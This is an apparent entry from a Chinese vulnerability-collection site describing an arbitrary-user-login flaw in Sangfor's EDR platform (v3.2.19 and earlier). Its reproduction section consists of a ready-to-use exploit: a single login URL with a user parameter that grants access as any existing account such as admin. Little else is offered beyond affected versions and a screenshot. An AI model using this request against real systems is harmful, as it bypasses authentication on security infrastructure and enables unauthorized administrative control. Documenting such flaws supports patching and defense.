深信服后台任意用户登陆漏洞-棉花糖会员站

# 深信服后台任意用户登陆漏洞

## 漏洞描述

深信服终端检测响应平台是深信服公司开发的一套EDR系统。攻击者利用该漏洞，登录任意用户

## 影响版本

> [!NOTE]
>
> EDR <= v3.2.19 ## 漏洞复现 https://xxx.xxx.xxx.xxx/ui/login.php?user=admin > [!NOTE]
>
> 注意最后的admin需要为存在的用户名

![](./image/sxf-2.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

深信服后台任意用户登陆漏洞

请登录后发表评论

1新增沉浸式翻译插件deepl pro api共享

2HertzBeat(赫兹跳动) 开源实时监控系统默认口令

3用友NC-Cloud process SQL注入

4顺景ERP GetFile任意文件读取

5中成科信票务管理系统UploadHandler.ashx任意文件上传

6【投稿】Linux应急响应and安全加固